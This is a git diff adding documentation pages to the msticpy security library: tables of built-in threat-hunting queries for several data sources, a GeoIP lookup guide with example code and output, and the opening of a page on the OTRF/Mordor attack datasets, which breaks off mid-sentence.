+WindowsSecurity     list_host_logon_failures          Retrieves the logon failure events on the host                                                               end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
+WindowsSecurity     list_host_logons                  Retrieves the logon events on the host                                                                       end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
+WindowsSecurity     list_host_processes               Retrieves list of processes on a host                                                                        end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
+WindowsSecurity     list_hosts_matching_commandline   Retrieves processes on hosts with matching commandline                                                       commandline (str), end (datetime), process_name (str), start (datetime)                                          SecurityEvent
+WindowsSecurity     list_logon_attempts_by_account    Retrieves the logon events for an account                                                                    account_name (str), end (datetime), start (datetime)                                                             SecurityEvent
+WindowsSecurity     list_logon_failures_by_account    Retrieves the logon failure events  for an account                                                           account_name (str), end (datetime), start (datetime)                                                             SecurityEvent
+WindowsSecurity     list_logons_by_account            Retrieves the logon events for an account                                                                    account_name (str), end (datetime), start (datetime)                                                             SecurityEvent
+WindowsSecurity     list_matching_processes           Retrieves list of processes matching process name                                                            end (datetime), process_name (str), start (datetime)                                                             SecurityEvent
+WindowsSecurity     list_other_events                 Retrieves list of events other than logon and process on a host                                              end (datetime), host_name (str), start (datetime)                                                                SecurityEvent
+WindowsSecurity     list_processes_in_session         Retrieves all processes on the host for a logon session                                                      end (datetime), host_name (str), logon_session_id (str), process_id (str), process_name (str), start (datetime)  SecurityEvent
+==================  ================================  ===========================================================================================================  ===============================================================================================================  ===========================
+
+
+
+Queries for Microsoft 365 Defender
+----------------------------------
+
+Data Environment identifier: M365D
+
+============  ==========================  ==================================================================================================================================  ==================================================================  ===================
+QueryGroup    Query                       Description                                                                                                                         Req-Params                                                          Table
+============  ==========================  ==================================================================================================================================  ==================================================================  ===================
+MDATP         file_path                   Lists all file events from files in a certain path                                                                                  end (datetime), path (str), start (datetime)                        DeviceProcessEvents
+MDATP         host_alerts                 Lists alerts by for a specified hostname                                                                                            end (datetime), host_name (str), start (datetime)                   DeviceAlertEvents
+MDATP         host_connections            Lists alerts by for a specified hostname                                                                                            end (datetime), host_name (str), start (datetime)                   DeviceNetworkEvents
+MDATP         ip_alerts                   Lists alerts associated with a specified remote IP                                                                                  end (datetime), ip_address (str), start (datetime)                  DeviceAlertEvents
+MDATP         ip_connections              Lists alerts associated with a specified remote IP                                                                                  end (datetime), ip_address (str), start (datetime)                  DeviceNetworkEvents
+MDATP         list_alerts                 Retrieves list of alerts                                                                                                            end (datetime), start (datetime)                                    DeviceAlertEvents
+MDATP         list_connections            Retrieves list of network connections for a host                                                                                    end (datetime), start (datetime)                                    DeviceNetworkEvents
+MDATP         list_filehash               Lists all file events by hash                                                                                                       end (datetime), file_hash (str), start (datetime)                   DeviceProcessEvents
+MDATP         list_files                  Lists all file events by filename                                                                                                   end (datetime), file_name (str), start (datetime)                   DeviceProcessEvents
+MDATP         list_host_processes         Lists all process creations for a host                                                                                              end (datetime), host_name (str), start (datetime)                   DeviceProcessEvents
+MDATP         process_cmd_line            Lists all processes with a command line containing a string                                                                         cmd_line (str), end (datetime), start (datetime)                    DeviceProcessEvents
+MDATP         process_creations           Lists all processes created by name or hash                                                                                         end (datetime), process_identifier (str), start (datetime)          DeviceProcessEvents
+MDATP         process_paths               Lists all processes created from a path                                                                                             end (datetime), file_path (str), start (datetime)                   DeviceProcessEvents
+MDATP         protocol_connections        Lists alerts associated with a specified protocol                                                                                   end (datetime), protocol (str), start (datetime)                    DeviceNetworkEvents
+MDATP         sha1_alerts                 Lists alerts associated with a specified SHA1 hash                                                                                  end (datetime), file_hash (str), start (datetime)                   DeviceAlertEvents
+MDATP         url_alerts                  Lists alerts associated with a specified URL                                                                                        end (datetime), start (datetime), url (str)                         DeviceAlertEvents
+MDATP         url_connections             Lists alerts associated with a specified URL                                                                                        end (datetime), start (datetime), url (str)                         DeviceNetworkEvents
+MDATP         user_files                  Lists all files created by a user                                                                                                   account_name (str), end (datetime), start (datetime)                -
+MDATP         user_logons                 Lists all user logons by user                                                                                                       account_name (str), end (datetime), start (datetime)                -
+MDATP         user_network                Lists all network connections associated with a user                                                                                account_name (str), end (datetime), start (datetime)                -
+MDATP         user_processes              Lists all processes created by a user                                                                                               account_name (str), end (datetime), start (datetime)                -
+MDATPHunting  accessibility_persistence   This query looks for persistence or privilege escalation done using Windows Accessibility features.                                 end (datetime), start (datetime)                                    -
+MDATPHunting  av_sites                    Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites                           end (datetime), start (datetime)                                    -
+MDATPHunting  b64_pe                      Finding base64 encoded PE files header seen in the command line parameters                                                          end (datetime), start (datetime)                                    -
+MDATPHunting  brute_force                 Look for public IP addresses that failed to logon to a computer multiple times, using multiple accounts, and eventually succeeded.  end (datetime), start (datetime)                                    -
+MDATPHunting  cve_2018_1000006l           Looks for CVE-2018-1000006 exploitation                                                                                             end (datetime), start (datetime)                                    -
+MDATPHunting  cve_2018_1111               Looks for CVE-2018-1111 exploitation                                                                                                end (datetime), start (datetime)                                    -
+MDATPHunting  cve_2018_4878               This query checks for specific processes and domain TLD used in the CVE-2018-4878                                                   end (datetime), start (datetime)                                    -
+MDATPHunting  doc_with_link               Looks for a Word document attachment, from which a link was clicked, and after which there was a browser download.                  end (datetime), start (datetime)                                    -
+MDATPHunting  dropbox_link                Looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site.                            end (datetime), start (datetime)                                    -
+MDATPHunting  email_link                  Look for links opened from mail apps – if a detection occurred right afterwards                                                     end (datetime), start (datetime)                                    -
+MDATPHunting  email_smartscreen           Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning                           end (datetime), start (datetime)                                    -
+MDATPHunting  malware_recycle             Finding attackers hiding malware in the recycle bin.                                                                                end (datetime), start (datetime)                                    -
+MDATPHunting  network_scans               Looking for high volume queries against a given RemoteIP, per ComputerName, RemotePort and Process                                  end (datetime), start (datetime)                                    -
+MDATPHunting  powershell_downloads        Finds PowerShell execution events that could involve a download.                                                                    end (datetime), start (datetime)                                    -
+MDATPHunting  service_account_powershell  Service Accounts Performing Remote PowerShell                                                                                       end (datetime), start (datetime)                                    -
+MDATPHunting  smartscreen_ignored         Query for SmartScreen URL blocks, where the user has decided to run the malware nontheless.                                         end (datetime), start (datetime)                                    -
+MDATPHunting  smb_discovery               Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares.             end (datetime), start (datetime)                                    -
+MDATPHunting  tor                         Looks for Tor client, or for a common Tor plugin called Meek.                                                                       end (datetime), start (datetime)                                    -
+MDATPHunting  uncommon_powershell         Find which uncommon Powershell Cmdlets were executed on that machine in a certain time period.                                      end (datetime), host_name (str), start (datetime), timestamp (str)  -
+MDATPHunting  user_enumeration            The query finds attempts to list users or groups using Net commands                                                                 end (datetime), start (datetime)                                    -
+============  ==========================  ==================================================================================================================================  ==================================================================  ===================
+
+
+
+Queries for Microsoft Graph
+---------------------------
+
+Data Environment identifier: SecurityGraph
+
+==================  ====================  ====================================================  ==================================================  =======
+QueryGroup          Query                 Description                                           Req-Params                                          Table
+==================  ====================  ====================================================  ==================================================  =======
+SecurityGraphAlert  get_alert             Retrieves a single alert by AlertId                   alert_id (str)                                      -
+SecurityGraphAlert  list_alerts           Retrieves list of alerts                              end (datetime), start (datetime)                    -
+SecurityGraphAlert  list_alerts_for_file  Retrieves list of alerts for file name, path or hash  end (datetime), start (datetime)                    -
+SecurityGraphAlert  list_alerts_for_host  Retrieves list of alerts for a hostname or FQDN       end (datetime), host_name (str), start (datetime)   -
+SecurityGraphAlert  list_alerts_for_ip    Retrieves list of alerts for a IP Address             end (datetime), ip_address (str), start (datetime)  -
+SecurityGraphAlert  list_alerts_for_user  Retrieves list of alerts for a user account           end (datetime), start (datetime)                    -
+SecurityGraphAlert  list_related_alerts   Retrieves list of alerts with a common entity         end (datetime), start (datetime)                    -
+==================  ====================  ====================================================  ==================================================  =======
+
+
+
+Queries for Splunk
+------------------
+
+Data Environment identifier: Splunk
+
+==============  =========================  =============================================================  ====================================================  =======
+QueryGroup      Query                      Description                                                    Req-Params                                            Table
+==============  =========================  =============================================================  ====================================================  =======
+Alerts          list_alerts                Retrieves list of alerts                                       end (datetime), start (datetime)                      -
+Alerts          list_alerts_for_dest_ip    Retrieves list of alerts with a common destination IP Address  end (datetime), ip_address (str), start (datetime)    -
+Alerts          list_alerts_for_src_ip     Retrieves list of alerts with a common source IP Address       end (datetime), ip_address (str), start (datetime)    -
+Alerts          list_alerts_for_user       Retrieves list of alerts with a common username                end (datetime), start (datetime), user (str)          -
+Alerts          list_all_alerts            Retrieves all configured alerts                                end (datetime), start (datetime)                      -
+Authentication  list_logon_failures        All failed user logon events on any host                       end (datetime), start (datetime)                      -
+Authentication  list_logons_for_account    All successful user logon events for account (all hosts)       account_name (str), end (datetime), start (datetime)  -
+Authentication  list_logons_for_host       All logon events on a host                                     end (datetime), host_name (str), start (datetime)     -
+Authentication  list_logons_for_source_ip  All successful user logon events for source IP (all hosts)     end (datetime), ip_address (str), start (datetime)    -
+SplunkGeneral   get_events_parameterized   Generic parameterized query from index/source                  end (datetime), start (datetime)                      -
+SplunkGeneral   list_all_datatypes         Summary of all events by index and sourcetype                  end (datetime), start (datetime)                      -
+SplunkGeneral   list_all_savedsearches     Retrieves all saved searches                                   end (datetime), start (datetime)                      -
+audittrail      list_all_audittrail        Retrieves all audit trail logs                                 end (datetime), start (datetime)                      -
+==============  =========================  =============================================================  ====================================================  =======
+
+
+
+Queries for Azure Resource Graph
+--------------------------------
+
+Data Environment identifier: ResourceGraph
+
+=============  ==============================  ====================================================  ===================  =========
+QueryGroup     Query                           Description                                           Req-Params           Table
+=============  ==============================  ====================================================  ===================  =========
+ResourceGraph  list_detailed_virtual_machines  Retrieves list of VMs with network details                                 resources
+ResourceGraph  list_public_ips                 Retrieves list of resources with public IP addresses                       resources
+ResourceGraph  list_resources                  Retrieves list of resources                                                resources
+ResourceGraph  list_resources_by_api_version   Retrieves list of resources for each API version                           resources
+ResourceGraph  list_resources_by_type          Retrieves list of resources by type                   resource_type (str)  resources
+ResourceGraph  list_virtual_machines           Retrieves list of VM resources                                             resources
+=============  ==============================  ====================================================  ===================  =========
+
+
+
+Queries for Sumologic
+---------------------
+
+Data Environment identifier: Sumologic
+
+================  ==================  =======================================  ================================  =======
+QueryGroup        Query               Description                              Req-Params                        Table
+================  ==================  =======================================  ================================  =======
+SumologicGeneral  list_all_datatypes  Summary of all events by sourceCategory  end (datetime), start (datetime)  -
+================  ==================  =======================================  ================================  =======
+
+
+
+Queries for Local Data
+----------------------
+
+Data Environment identifier: LocalData
+
+===============  ================================  ======================================  ============  =======
+QueryGroup       Query                             Description                             Req-Params    Table
+===============  ================================  ======================================  ============  =======
+Azure            list_all_signins_geo              List all Azure AD logon events                        -
+Network          list_azure_network_flows_by_host  List Azure Network flows by host name                 -
+Network          list_azure_network_flows_by_ip    List Azure Network flows by IP address                -
+SecurityAlert    list_alerts                       Retrieves list of alerts                              -
+WindowsSecurity  get_process_tree                  Get process tree for a process                        -
+WindowsSecurity  list_host_events                  List events failures on host                          -
+WindowsSecurity  list_host_logon_failures          List logon failures on host                           -
+WindowsSecurity  list_host_logons                  List logons on host                                   -
+WindowsSecurity  list_host_processes               List processes on host                                -
+===============  ================================  ======================================  ============  =======
+
+
diff --git a/docs/source/data_acquisition/GeoIPLookups.rst b/docs/source/data_acquisition/GeoIPLookups.rst
new file mode 100644
index 000000000..af2edeede
--- /dev/null
+++ b/docs/source/data_acquisition/GeoIPLookups.rst
@@ -0,0 +1,505 @@
+GeoIP Lookup
+============
+
+Introduction
+------------
+
+This :py:mod:`module<msticpy.sectools.geoip>` contains two classes
+that allow you to look up the Geolocation of IP Addresses.
+
+MaxMind GeoIPLite
+^^^^^^^^^^^^^^^^^
+
+This product includes GeoLite2 data created by MaxMind, available from
+https://www.maxmind.com.
+
+This uses a local database which is downloaded first time when class
+object is instantiated. It gives very fast lookups but you need to
+download updates regularly. Maxmind offers a free tier of this database,
+updated monthly. For greater accuracy and more detailed information they
+have varying levels of paid service. Please check out their site for
+more details.
+
+The geoip module uses the official Maxmind PyPi package - geoip2.
+
+IPStack
+^^^^^^^
+
+
+This library uses services provided by ipstack. https://ipstack.com
+
+IPStack is an online service and also offers a free tier of their
+service. Again, the paid tiers offer greater accuracy, more detailed
+information and higher throughput. Please check out their site for more
+details.
+
+Importing the GeoIP classes
+---------------------------
+
+.. code:: ipython3
+
+    # Imports
+    import sys
+    MIN_REQ_PYTHON = (3,6)
+    if sys.version_info < MIN_REQ_PYTHON:
+        print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
+        print('or later is selected as the active kernel.')
+        sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)
+
+
+    from IPython.display import display
+    import pandas as pd
+
+    import msticpy.sectools as sectools
+    from msticpy.nbtools import *
+    from msticpy.nbtools.entityschema import IpAddress, GeoLocation
+    from msticpy.sectools.geoip import GeoLiteLookup, IPStackLookup
+
+
+
+
+Maxmind Geo-IP Lite Lookup Class
+--------------------------------
+
+See :py:class:`GeoLiteLookup<msticpy.sectools.geoip.GeoLiteLookup>`
+
+.. note:: Maxmind now require an API Key to download database
+   updates. You can create a free account or opt for a paid tier,
+   which gives you greater accuracy and more features.
+
+
+Setting GeoIPLite configuration options
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+You can supply options for the GeoLiteLookup class within the
+`msticpyconfig.yaml` configuration file (see
+:doc:`../getting_started/msticpyconfig`) or when instantiating the
+GeoLiteLookup class.
+
+The example shown here shows part of the ``OtherProviders`` section of
+msticpyconfig.yaml. You can specify an API key in the ``AuthKey`` setting.
+For example, ``AuthKey: abcd424246789`` or use a reference to an
+environment variable holding the key value.
+The API key you need to specify in the ``AuthKey`` setting is you MaxMind
+License Key that can be found on the MaxMind website under Account > Services.
+
+The DBFolder setting specifies a folder where the downloaded Maxmind
+database files will be stored and referenced from. Thefolder path
+can be prefixed with "~" to specify a path relative to the current
+users home directory (this works cross-platform).
+
+.. note:: You can specify the MaxMind API key value as an environment
+  variable as follows:
+
+.. code:: yaml
+
+    ...
+    OtherProviders:
+      GeoIPLite:
+        Args:
+          AuthKey:
+            EnvironmentVar: "MAXMIND_AUTH"
+          DBFolder: "~/.msticpy"
+        Provider: "GeoLiteLookup"
+
+.. note:: Alternatively you can specify it directly in the config file
+  in AuthKey:
+
+.. code:: yaml
+
+    ...
+    OtherProviders:
+      GeoIPLite:
+        Args:
+          AuthKey: "your_maxmind_key"
+          DBFolder: "~/.msticpy"
+        Provider: "GeoLiteLookup"
+
+You can also specify the API key and folder options when creating an
+instance of the GeoLiteLookup class. In this case the folder path
+must be either an absolute or relative path - expansion of "~" will
+not work reliably cross-platform.
+
+
+.. code:: ipython3
+
+    iplocation = GeoLiteLookup(api_key="mykey", db_folder="/tmp/mmdb")
+
+
+GeoLite Usage
+^^^^^^^^^^^^^
+
+Creating an instance of the GeoLiteLookup class
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    iplocation = GeoLiteLookup()
+
+You can also supply options to customize the behavior of the
+local maxmind database.
+
+* ``api_key``: described above
+* ``db_folder`` : Specify custom path containing local Maxmind city
+  database. If not specified, download to .msticpy dir under user's home
+  directory.
+*  ``force_update`` : Set to ``True`` to force
+   update without an age-check the current database.
+*  ``auto_update`` : ``True`` (default) will check the age of the Maxmind
+   city database if the current database is older than 30 days. Setting
+   to ``False`` to skip age checking.
+   ``force_update=True`` will override this setting.
+
+
+Lookup IP location from GeoLite2 database
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can pass a single IP Address, a list of IPAddresses or an IpAddress
+entity (see :py:class:`IpAddress<msticpy.nbtools.entityschema.IpAddress>`)
+
+
+.. code:: ipython3
+
+    iplocation = GeoLiteLookup()
+    loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')
+
+    print('Raw result')
+    display(loc_result)
+
+    print('IP Address Entity')
+    display(ip_entity[0])
+
+
+.. parsed-literal::
+
+    No local Maxmind City Database found.  Attempting to downloading new database to /home/nbuser/.msticpy
+    Downloading GeoLite DB archive from MaxMind....
+    Extracting city database...
+    Extraction complete. Local Maxmind city DB: /home/nbuser/.msticpy/GeoLite2-City.mmdb
+    Raw result
+
+
+
+.. parsed-literal::
+
+    [{'continent': {'code': 'EU',
+       'geoname_id': 6255148,
+       'names': {'de': 'Europa',
+        'en': 'Europe',
+        'es': 'Europa',
+        'fr': 'Europe',
+        'ja': 'ヨーロッパ',
+        'pt-BR': 'Europa',
+        'ru': 'Европа',
+        'zh-CN': '欧洲'}},
+      'country': {'geoname_id': 2017370,
+       'iso_code': 'RU',
+       'names': {'de': 'Russland',
+        'en': 'Russia',
+        'es': 'Rusia',
+        'fr': 'Russie',
+        'ja': 'ロシア',
+        'pt-BR': 'Rússia',
+        'ru': 'Россия',
+        'zh-CN': '俄罗斯'}},
+      'location': {'accuracy_radius': 1000,
+       'latitude': 55.7386,
+       'longitude': 37.6068,
+       'time_zone': 'Europe/Moscow'},
+      'registered_country': {'geoname_id': 2017370,
+       'iso_code': 'RU',
+       'names': {'de': 'Russland',
+        'en': 'Russia',
+        'es': 'Rusia',
+        'fr': 'Russie',
+        'ja': 'ロシア',
+        'pt-BR': 'Rússia',
+        'ru': 'Россия',
+        'zh-CN': '俄罗斯'}},
+      'traits': {'ip_address': '90.156.201.97'}}]
+
+
+.. parsed-literal::
+
+    IP Address Entity
+
+    IpAddress(Type=ipaddress, Address=90.156.201.97, Location={ 'AdditionalData': {},
+      'Count...)
+
+
+Looking up a list of IP Addresses with GeoLiteLookup
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+.. code:: ipython3
+
+    import socket
+    socket_info = socket.getaddrinfo("pypi.org",0,0,0,0)
+
+    ips = [res[4][0] for res in socket_info]
+    print(ips)
+
+    _, ip_entities = iplocation.lookup_ip(ip_addr_list=ips)
+    display(ip_entities)
+
+
+.. parsed-literal::
+
+    ['151.101.0.223', '151.101.0.223', '151.101.0.223', '151.101.128.223', '151.101.128.223', '151.101.128.223', '151.101.64.223', '151.101.64.223', '151.101.64.223', '151.101.192.223', '151.101.192.223', '151.101.192.223', '2a04:4e42::223', '2a04:4e42::223', '2a04:4e42::223', '2a04:4e42:600::223', '2a04:4e42:600::223', '2a04:4e42:600::223', '2a04:4e42:400::223', '2a04:4e42:400::223', '2a04:4e42:400::223', '2a04:4e42:200::223', '2a04:4e42:200::223', '2a04:4e42:200::223']
+
+
+
+.. parsed-literal::
+
+    [IpAddress(Type=ipaddress, Address=151.101.0.223, Location={ 'AdditionalData': {},
+       'Count...),
+     IpAddress(Type=ipaddress, Address=151.101.0.223, Location={ 'AdditionalData': {},
+       'Count...),
+     IpAddress(Type=ipaddress, Address=151.101.0.223, Location={ 'AdditionalData': {},
+       'Count...),
+     IpAddress(Type=ipaddress, Address=151.101.128.223, Location={ 'AdditionalData': {},
+       'Cou...),
+     IpAddress(Type=ipaddress, Address=151.101.128.223, Location={ 'AdditionalData': {},
+       'Cou...),
+     IpAddress(Type=ipaddress, Address=151.101.128.223, Location={ 'AdditionalData': {},
+       'Cou...),
+     IpAddress(Type=ipaddress, Address=151.101.64.223, Location={ 'AdditionalData': {},
+       'Coun...),
+     IpAddress(Type=ipaddress, Address=151.101.64.223, Location={ 'AdditionalData': {},
+       'Coun...),
+     IpAddress(Type=ipaddress, Address=151.101.64.223, Location={ 'AdditionalData': {},
+       'Coun...),
+     IpAddress(Type=ipaddress, Address=151.101.192.223, Location={ 'AdditionalData': {},
+       'Cou...),
+     IpAddress(Type=ipaddress, Address=151.101.192.223, Location={ 'AdditionalData': {},
+       'Cou...),
+     IpAddress(Type=ipaddress, Address=151.101.192.223, Location={ 'AdditionalData': {},
+       'Cou...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42::223, Location={'AdditionalData': {}, 'Latitud...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42::223, Location={'AdditionalData': {}, 'Latitud...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42::223, Location={'AdditionalData': {}, 'Latitud...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:600::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:600::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:600::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:400::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:400::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:400::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:200::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:200::223, Location={'AdditionalData': {}, 'Lat...),
+     IpAddress(Type=ipaddress, Address=2a04:4e42:200::223, Location={'AdditionalData': {}, 'Lat...)]
+
+
+IPStack Geo-lookup Class
+------------------------
+
+See :py:class:`IPStackLookup<msticpy.sectools.geoip.IPStackLookup>`
+
+
+.. note:: IPStack requires an IPStack API Key.
+   If you have a paid tier service with IPStack you should enable
+   the bulk lookup option when instantiating the class. This
+   allows more efficient batching when querying multiple IP Addresses.
+   Trying to use option with the free tier will result in the
+   request being rejected.
+
+Setting IPStack configuration options
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+You can supply options for the IPStack class within the
+`msticpyconfig.yaml` configuration file (see
+:doc:`../getting_started/msticpyconfig`) or when instantiating the
+class.
+
+The example shown here shows part of the ``OtherProviders`` section of
+msticpyconfig.yaml. You can specify an API key in the ``AuthKey`` setting.
+For example, ``AuthKey: abcd424246789`` or use a reference to an
+environment variable holding the key value, as shown in the example.
+
+.. code:: yaml
+
+    ...
+    OtherProviders:
+      IPStack:
+        Args:
+          AuthKey: "987654321-222"
+        Provider: "IPStackLookup"
+
+
+IPStack Usage
+^^^^^^^^^^^^^
+
+Manually Entering the IPStack Key
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    # Enter your IPStack Key here
+    ips_key = nbwidgets.GetEnvironmentKey(env_var='IPSTACK_API_KEY',
+                               help_str='To obtain an API key sign up here https://www.ipstack.com/',
+                               prompt='IPStack API key:')
+    iplocation = IPStackLookup(api_key=ips_key.value)
+
+
+Lookup IP location from IPStack
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+.. code:: ipython3
+
+    # Assumes that you have configured the AuthKey value in msticpyconfig.yaml
+    iplocation = IPStackLookup()
+    loc_result, ip_entity = iplocation.lookup_ip(ip_address='90.156.201.97')
+    print('Raw result')
+    display(loc_result)
+
+    print('IP Address Entity')
+    display(ip_entity[0])
+
+
+.. parsed-literal::
+
+    Raw result
+
+
+
+.. parsed-literal::
+
+    [({'ip': '90.156.201.97',
+       'type': 'ipv4',
+       'continent_code': 'EU',
+       'continent_name': 'Europe',
+       'country_code': 'RU',
+       'country_name': 'Russia',
+       'region_code': None,
+       'region_name': None,
+       'city': None,
+       'zip': None,
+       'latitude': 55.7386,
+       'longitude': 37.6068,
+       'location': {'geoname_id': None,
+        'capital': 'Moscow',
+        'languages': [{'code': 'ru', 'name': 'Russian', 'native': 'Русский'}],
+        'country_flag': 'http://assets.ipstack.com/flags/ru.svg',
+        'country_flag_emoji': '🇷🇺',
+        'country_flag_emoji_unicode': 'U+1F1F7 U+1F1FA',
+        'calling_code': '7',
+        'is_eu': False}},
+      200)]
+
+
+.. parsed-literal::
+
+    IP Address Entity
+
+
+.. parsed-literal::
+
+    {"Address": "90.156.201.97", "Location": {"CountryCode": "RU", "CountryName": "Russia", "Longitude": 37.6068, "Latitude": 55.7386, "Type": "geolocation"}, "Type": "ipaddress"}
+
+
+Looking up a list of IP Addresses with IPStackLookup
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+    loc_result, ip_entities = iplocation.lookup_ip(ip_addr_list=ips)
+
+    display(ip_entities)
+
+
+.. parsed-literal::
+
+    [{"Address": "2a04:4e42:400::223", "Location": {"Longitude": 8, "Latitude": 47, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "2a04:4e42:200::223", "Location": {"Longitude": 8, "Latitude": 47, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "2a04:4e42:600::223", "Location": {"Longitude": 8, "Latitude": 47, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "2a04:4e42::223", "Location": {"Longitude": 8, "Latitude": 47, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "151.101.64.223", "Location": {"CountryCode": "US", "CountryName": "United States", "Longitude": -97.822, "Latitude": 37.751, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "151.101.0.223", "Location": {"CountryCode": "US", "CountryName": "United States", "Longitude": -97.822, "Latitude": 37.751, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "151.101.192.223", "Location": {"CountryCode": "US", "CountryName": "United States", "Longitude": -97.822, "Latitude": 37.751, "Type": "geolocation"}, "Type": "ipaddress"},
+     {"Address": "151.101.128.223", "Location": {"CountryCode": "US", "CountryName": "United States", "Longitude": -97.822, "Latitude": 37.751, "Type": "geolocation"}, "Type": "ipaddress"}]
+
+
+Taking input from a pandas DataFrame
+------------------------------------
+
+See :py:meth:`df_lookup_ip<msticpy.sectools.geoip.GeoIpLookup.df_lookup_ip>`
+
+The base class for both implementations has a method that sources the ip
+addresses from a dataframe column and returns a new dataframe with the
+location information merged with the input frame.
+
+Pass the input DataFrame using the ``data`` parameter and specify a
+column name containing the IPAddresses with the ``column`` parameter.
+
+
+
+
+Creating a Custom GeopIP Lookup Class
+-------------------------------------
+
+You can derive a class that implements the same operations to use with a
+different GeoIP service by subclassing the GeoIpLookup class.
+
+See :py:class:`GeoIpLookup<msticpy.sectools.geoip.GeoIpLookup>`
+
+You should override the lookup_ip method implementing your own method of
+geoip lookup.
+
+
+Calculating Geographical Distances
+----------------------------------
+
+Use the :py:func:`geo_distance<msticpy.sectools.geoip.geo_distance>` function from
+msticpy.sectools.geoip to calculate distances between two locations.
+
+I am indebted to Martin Thoma who
+posted this solution (which I’ve modified slightly) on Stackoverflow.
+
+
+.. code:: ipython3
+
+    from msticpy.sectools.geoip import geo_distance
+    _, ip_entity1 = iplocation.lookup_ip(ip_address='90.156.201.97')
+    _, ip_entity2 = iplocation.lookup_ip(ip_address='151.101.64.223')
+
+    print(ip_entity1[0])
+    print(ip_entity2[0])
+    dist = geo_distance(origin=(ip_entity1[0].Location.Latitude, ip_entity1[0].Location.Longitude),
+                        destination=(ip_entity2[0].Location.Latitude, ip_entity2[0].Location.Longitude))
+    print(f'\nDistance between IP Locations = {round(dist, 1)}km')
+
+
+.. parsed-literal::
+
+    { 'Address': '90.156.201.97',
+      'Location': { 'CountryCode': 'RU',
+                    'CountryName': 'Russia',
+                    'Latitude': 55.7386,
+                    'Longitude': 37.6068,
+                    'Type': 'geolocation'},
+      'Type': 'ipaddress'}
+    { 'Address': '151.101.64.223',
+      'Location': { 'CountryCode': 'US',
+                    'CountryName': 'United States',
+                    'Latitude': 37.751,
+                    'Longitude': -97.822,
+                    'Type': 'geolocation'},
+      'Type': 'ipaddress'}
+
+    Distance between IP Locations = 8796.8km
+
+
+.. code:: ipython3
+
+    dist2 = entity_distance(ip_entity1[0],ip_entity2[0])
+    print(f'\nDistance between IP Entity Locations = {round(dist2, 1)}km')
+
+
+.. parsed-literal::
+
+
+    Distance between IP Locations = 8796.8km
+
+
+See also
+--------
+
+:doc:`../visualization/FoliumMap`
\ No newline at end of file
diff --git a/docs/source/data_acquisition/MordorData.rst b/docs/source/data_acquisition/MordorData.rst
new file mode 100644
index 000000000..e0b7f969a
--- /dev/null
+++ b/docs/source/data_acquisition/MordorData.rst
@@ -0,0 +1,426 @@
+Open Threat Research Security Datasets data provider and browser
+================================================================
+
+The `OTRF <https://github.com/OTRF>`__ Security Datasets
+is a project to capture host and network log data
+that illustrates adversarial attack patterns. Mordor is part of the
+Open Threat Research Forge created by Roberto Rodriquez and Jose
+Rodriguez. It was originally named **Mordor** and the *MSTICPy*
+naming still uses that (which we are rather fond of). In
+this document we will use **Mordor** and **OTRF Security Datasets**
+interchangeably - they both refer to the same thing
+
+The Mordor project provides one of the most comprehensive
+libraries of attack logs - the captured logs contain not just the
+events directly related to the attack but also the set of benign events
+happening at the time of the attack. Each data set is mapped to
+Mitre ATT&CK techniques and tactics and includes simulation scripts
+to allow you to produce the same data in your environment. This makes
+Mordor very useful for testing detection logic - whether simple rules
+or in more complex machine learning scenarios requiring labelled data.
+
+This library allows you to browse through and query Mordor data sets
+and query individual data sets in a similar way to other MSTICPy
+data providers. Like the other providers, the Mordor provider
+returns results as a pandas DataFrame, allowing it to be used
+easily in Jupyter notebooks and other Python code. Unlike other
+providers, it does not support custom queries or a query language.
+The equivalent built-in queries for the Mordor provider return
+the entire set of data for that item.
+
+For more information on the OTRF data sets see the
+`OTRF Jupyter Book documentation <https://securitydatasets.com/introduction.html>`__
+and the `GitHub repository <https://github.com/OTRF/Security-Datasets>`__.
+
+
+For more information on Mitre ATT&CK Techniques and Tactics see
+`Mitre ATT&CK <https://attack.mitre.org/>`__.
+
+You can view a notebook that shows the use of the Mordor
+provider here
